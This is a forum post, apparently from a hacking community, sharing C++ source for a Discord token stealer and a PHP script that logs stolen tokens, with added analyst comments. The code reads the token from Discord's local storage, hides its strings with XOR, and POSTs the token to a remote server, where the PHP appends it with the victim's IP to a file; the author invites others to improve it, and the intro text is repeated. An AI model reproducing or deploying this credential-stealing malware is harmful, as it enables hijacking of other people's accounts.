ini
Hello ugbase, I started to build a shitty tool and decided to publish it; maybe someone finds it useful. Basically it grabs the token from the local storage file located in appdata\discord\
The code is not perfect, but it is worth having as a base to be improved in the future. This topic can be used to upload your improvements, or we can discuss the subject with respect and with the purpose of sharing knowledge.
So, basic explanation: the discord client executable saves one token in local storage that can be used to hijack others' accounts.
This is how the path looks : \AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage
In the file I uploaded you can see the sqlite folder and the curl lib; those libs can be added to the project.
Sqlite is used to read the local storage database and get the token column from the table.
If you download http://sqlitebrowser.org/
you can open your localstorage and check how its data is saved.
Some imgs:
with discord client
If you have Discord open, you can open the console by pressing [ Ctrl+Shift+I ]
So lets start with the c++ part:
if you want also the server shit u can add a simple php for save the stolen tokens in ur web:
i send here curl lib and sqlite
FILES
The code is not perfect, but it is worth having as a base to be improved in the future. This topic can be used to upload your improvements, or we can discuss the subject with respect and with the purpose of sharing knowledge.
So, basic explanation: the discord client executable saves one token in local storage that can be used to hijack others' accounts.
This is how the path looks : \AppData\Roaming\discord\Local Storage\https_discordapp.com_0.localstorage
In the file I uploaded you can see the sqlite folder and the curl lib; those libs can be added to the project.
Sqlite is used to read the local storage database and get the token column from the table.
If you download http://sqlitebrowser.org/
you can open your localstorage and check how its data is saved.
Some imgs:
with discord client
If you have Discord open, you can open the console by pressing [ Ctrl+Shift+I ]
So lets start with the c++ part:
Code:
// DiscordToken.cpp: define el punto de entrada de la aplicación de consola.
//
#include "stdafx.h"
using namespace std;
// Analyst note: every array below is a string XORed byte-by-byte with the
// repeating key "CLSID/VENDOR" (see xor_crypt). Storing the strings this way
// keeps the file path, SQL text and registry names out of a plain `strings`
// dump of the binary; the XORed byte sequences themselves are stable and can
// serve as static signatures for this sample.
//crypted strings
// 58 bytes; decodes to the "\discord\Local Storage\..." path quoted in the
// post, which main() appends to the user's roaming AppData directory.
char discord_path[58] = { (char)0x1f, (char)0x28, (char)0x3a, (char)0x3a, (char)0x27, (char)0x40, (char)0x24, (char)0x21, (char)0x12, (char)0x8, (char)0x20, (char)0x31, (char)0x22, (char)0x20, (char)0x73, (char)0x1a, (char)0x30, (char)0x40, (char)0x24, (char)0x24, (char)0x29, (char)0x21, (char)0x13, (char)0x3a, (char)0x37, (char)0x38, (char)0x23, (char)0x3a, (char)0x1b, (char)0x4b, (char)0x3f, (char)0x36, (char)0x2d, (char)0x2b, (char)0x3d, (char)0x36, (char)0x22, (char)0x3c, (char)0x23, (char)0x67, (char)0x27, (char)0x40, (char)0x3b, (char)0x1a, (char)0x7e, (char)0x6a, (char)0x23, (char)0x3d, (char)0x20, (char)0x2d, (char)0x3f, (char)0x3a, (char)0x30, (char)0x40, (char)0x24, (char)0x24, (char)0x29, (char)0x21 };
// 47 bytes; decodes to the SQL SELECT statement that main() hands to
// sqlite3_exec to read the row stored under the 'token' key.
char discord_query[47] = { (char)0x10, (char)0x9, (char)0x1f, (char)0xc, (char)0x7, (char)0x7b, (char)0x76, (char)0x33, (char)0x2f, (char)0x28, (char)0x3a, (char)0x37, (char)0x63, (char)0x2a, (char)0x21, (char)0x26, (char)0x29, (char)0xf, (char)0x1f, (char)0x31, (char)0x2b, (char)0x29, (char)0x1b, (char)0x33, (char)0x21, (char)0x20, (char)0x36, (char)0x69, (char)0x13, (char)0x67, (char)0x13, (char)0x17, (char)0xb, (char)0x64, (char)0x4, (char)0x37, (char)0x3a, (char)0x6c, (char)0x6e, (char)0x69, (char)0x63, (char)0x5b, (char)0x39, (char)0x2e, (char)0x2b, (char)0x2a, (char)0x68 };
// Registry subkey (under HKEY_CURRENT_USER in bGrabbed) used for the
// "already collected" marker. Author's plaintext note follows.
//SOFTWARE\'\'Discord
char discord_regedit_path[17] = { (char)0x10, (char)0x23, (char)0x35, (char)0x3d, (char)0x33, (char)0x4e, (char)0x24, (char)0x20, (char)0x12, (char)0x18, (char)0xb, (char)0x3b, (char)0x30, (char)0x2f, (char)0x3c, (char)0x3b, (char)0x20 };
// Registry value name read by bGrabbed.
//token
char discord_token[5] = { (char)0x37, (char)0x23, (char)0x38, (char)0x2c, (char)0x2a };
// Marker data: bGrabbed compares the registry value against this 32-hex-digit
// string to decide whether the host was already processed.
//4d4098d64e163d2726959455d046fd7c
char discord_state[32] = { (char)0x77, (char)0x28, (char)0x67, (char)0x79, (char)0x7d, (char)0x17, (char)0x32, (char)0x73, (char)0x7a, (char)0x21, (char)0x7e, (char)0x64, (char)0x70, (char)0x28, (char)0x61, (char)0x7e, (char)0x76, (char)0x19, (char)0x6f, (char)0x70, (char)0x77, (char)0x70, (char)0x7a, (char)0x67, (char)0x27, (char)0x7c, (char)0x67, (char)0x7f, (char)0x22, (char)0x4b, (char)0x61, (char)0x26 };
// Labelled "trick" by the author, but the bytes are discord_token plus one
// extra byte and decode to "token=". Not referenced anywhere in this listing.
//trick
char discord_trick[6] = { (char)0x37, (char)0x23, (char)0x38, (char)0x2c, (char)0x2a, (char)0x12, };
//shitty xor dec
// Decodes (or encodes; XOR is its own inverse) a string by XORing byte i with
// byte i % 12 of the fixed key "CLSID/VENDOR". This is string obfuscation
// only, not encryption: the key is a literal in the binary, so any analyst
// holding the sample can recover every protected string.
// @param toencrypt  input bytes (taken by value)
// @return           a string of the same length with each byte XORed
string xor_crypt(string toencrypt)
{
const char _v[] = "CLSID/VENDOR";
string output = toencrypt;
for (int i = 0; i < toencrypt.size(); i++) {
// key index wraps with strlen(_v), which is re-evaluated on every iteration
output[i] = toencrypt[i] ^ _v[i % strlen(_v)];
}
return output;
}
//shitty xor enc
// Author-side helper: performs the same XOR as xor_crypt and, as a side
// effect, prints to stdout a C array declaration ("char discord_char[N] = {
// ... };") holding the XORed bytes. The arrays at the top of the file have
// exactly this printed shape, so they were presumably generated with it.
// @param toencrypt  plaintext to obfuscate
// @return           the XORed string (main() discards it)
string xor_encrypt(string toencrypt)
{
const char _v[] = "CLSID/VENDOR";
string output = toencrypt;
printf("char discord_char[%d] = { ", toencrypt.size());
for (int i = 0; i < toencrypt.size(); i++) {
output[i] = toencrypt[i] ^ _v[i % strlen(_v)];
printf("(char)0x%x, ", output[i]);
}
printf(" };");
return output;
}
// BUFFERSIZE and the two prototypes below are declared but never used or
// defined in the listing shown on this page.
#define BUFFERSIZE 1024
void die_with_error(char *errorMessage);
void die_with_wserror(char *errorMessage);
// Checks the per-user "already processed" marker.
// Reads a REG_SZ value from HKEY_CURRENT_USER (subkey and value name come from
// the XOR-decoded discord_regedit_path / discord_token) and compares it with
// the decoded discord_state string.
// @return true when the registry data equals the marker, false otherwise.
// Defender note: the subkey, value name and 32-hex-digit data given in the
// author's comments on the arrays are a host-side indicator for this sample.
// The code that would write the marker is commented out in main(), so in the
// listing as posted nothing ever sets it. The return code of RegGetValue is
// not inspected here.
bool bGrabbed() {
char value[255];
DWORD BufferSize = 256;
string decrypted_regedit_path = xor_crypt(discord_regedit_path);
string decrypted_token = xor_crypt(discord_token);
string decrypted_state = xor_crypt(discord_state);
RegGetValue(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), decrypted_token.c_str(), REG_SZ, NULL, (PVOID)&value, &BufferSize);
if (strcmp(decrypted_state.c_str(), value) == 0) return true;
else return false;
}
// Existence probe: tries to open `name` for reading with fopen.
// @param name  path to test
// @return true when the open succeeds (the handle is closed again at once),
//         false when it fails.
// Defender note: main() calls this on the Discord local-storage file, so the
// probe is itself a read-open of that file by a process other than Discord.
bool bFileExists(char* name) {
if (FILE *file = fopen(name, "r")) {
fclose(file);
return true;
}
else {
fclose(file);
return false;
}
}
// Global buffer that receives the value read from the database; main() later
// formats it into the POST body.
char token[59];
// sqlite3_exec row callback. For every column of every returned row it walks
// byte offsets 2 through 118 of the column text and copies each non-zero byte
// into the global `token` buffer, in order.
// NOTE(review): skipping zero bytes and starting at offset 2 presumably
// compensates for how the stored value is encoded and quoted; that is not
// established by anything on this page.
// @param data       unused (main() passes NULL)
// @param argc       number of columns in the row
// @param argv       column values
// @param azColName  column names, unused
// @return 0 so that sqlite3_exec keeps iterating.
static int callback(void *data, int argc, char **argv, char **azColName) {
int i;
//printf("\nTOKEN:");
int j = 0;
for (i = 0; i < argc; i++) {
for (int c = 2; c <= 59 * 2; c++) {
if (argv[i][c] == 0) continue;
//printf("%c", argv[i][c]);
token[j] = argv[i][c];
//printf("|number:%d|", j);
j++;
}
}
return 0;
}
// Entry point. Behaviour as written in this listing:
//   1. If the registry marker is present (bGrabbed), print "kys" and skip to
//      the final cin.get().
//   2. Otherwise build <roaming AppData> + decoded discord_path, check that
//      the file exists, open it with sqlite3 and run the decoded query; the
//      row callback fills the global `token` buffer.
//   3. Send an HTTP POST whose body is "k=<token>" to a URL decoded from
//      `discord_char` with "p" appended.
//   4. The block that would write the registry marker is commented out.
// Analyst notes:
//   - `discord_char` is not defined anywhere in the listing, so the
//     destination URL is not recoverable from this page; the "k" form field
//     matches the PHP receiver shown further down.
//   - Observable behaviour: a non-Discord process opening the local-storage
//     database, followed by an outbound POST carrying a single field "k".
//   - The program also prints to its console (the generated array text from
//     xor_encrypt and the decoded URL) and waits on cin.get(), i.e. it is a
//     visible console test build rather than a hidden one.
int main()
{
bool Finished = false;
if (bGrabbed()) {
//INJECT
printf("kys");
}
else {
string decrypted_path = xor_crypt(discord_path);
string decrypted_query = xor_crypt(discord_query);
// Prints a generated array declaration for "token=" to stdout; `keked` is
// never read afterwards.
string keked = xor_encrypt("token=");
TCHAR achDevice[MAX_PATH];
HRESULT hr;
if (SUCCEEDED(hr = SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, achDevice))) {
// strcat appends in place, so achDevice and db_path refer to the same buffer.
char *db_path = strcat(achDevice, decrypted_path.c_str());
if (bFileExists(db_path)) {
sqlite3 *db;
int rc;
rc = sqlite3_open(achDevice, &db);
if (rc) {
// open failed: exit quietly with status 0
return(0);
}
// The result code of the query is stored in rc but not checked.
rc = sqlite3_exec(db, decrypted_query.c_str(), callback, NULL, NULL);
sqlite3_close(db);
//SEND DATA TO SERVER
//CURL LIB TEST
CURL *curl;
CURLcode res;
curl_global_init(CURL_GLOBAL_ALL);
curl = curl_easy_init();
if (curl) {
// discord_char: not declared in the visible listing (see header note).
string decryptes_url = xor_crypt(discord_char);
decryptes_url += "p";
cout << decryptes_url;
curl_easy_setopt(curl, CURLOPT_URL, decryptes_url.c_str());
char buffer[255];
// POST body has the fixed shape "k=<value>"; setting CURLOPT_POSTFIELDS
// makes libcurl issue a POST.
sprintf(buffer, "k=%s", token);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, buffer);
res = curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
curl_global_cleanup();
// Disabled code: would create the HKCU subkey if missing and store the
// marker string under the decoded value name, which is what bGrabbed()
// looks for on the next run.
//SET REGEDIT GIFT
//string decrypted_regedit_path = xor_crypt(discord_regedit_path);
//string decrypted_token = xor_crypt(discord_token);
//string decrypted_state = xor_crypt(discord_state);
//HKEY hkey;
//long regOpenResult;
//const char *path = decrypted_state.c_str();
//HKEY hKey = NULL;
//DWORD rtime;
////Step 1: Open the key
//long sts = RegOpenKeyEx(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), 0, KEY_READ, &hKey);
////Step 2: If failed, create the key
//if (ERROR_NO_MATCH == sts || ERROR_FILE_NOT_FOUND == sts)
//{
// long j = RegCreateKeyEx(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), 0L, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
// regOpenResult = RegOpenKeyEx(HKEY_CURRENT_USER, decrypted_regedit_path.c_str(), 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkey);
// LPCSTR stuff = decrypted_token.c_str();
// RegSetValueEx(hkey, stuff, 0, REG_SZ, (BYTE*)path, strlen(path));
//}
//RegCloseKey(hkey);
}
}
}
// Blocks until a line is entered on the console.
cin.get();
return 0;
}
if you want also the server shit u can add a simple php for save the stolen tokens in ur web:
PHP:
// Returns the address to log for the current request. Preference order:
// the Client-IP header, then X-Forwarded-For, then the socket peer address
// (REMOTE_ADDR). The first two are request headers supplied by the sender, so
// the logged value is whatever the client or an intermediate proxy claims and
// is not reliable evidence of where a request came from.
function getRealIpAddr()
{
if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
// Receiver side of the C++ client's POST: when a form field "k" is present,
// append one line "[CLIENT-IP]:<addr>[TOKEN]:<k>" to tokens.txt in the
// script's working directory. The field is written verbatim, with no
// authentication or validation of the sender.
// Responder note: on a seized or compromised web host, a tokens.txt file with
// this line format is the list of affected accounts; those sessions should be
// invalidated (password change / forced logout) by their owners.
if(isset($_POST['k'])){
$file = 'tokens.txt';
$somecontent = "[CLIENT-IP]:".getRealIpAddr()."[TOKEN]:".$_POST['k'];
$fp = fopen($file, 'a') or die('Could not open file!');
fwrite($fp, $somecontent."\r\n") or die('Could not write to file');
fclose($fp);
}
i send here curl lib and sqlite
FILES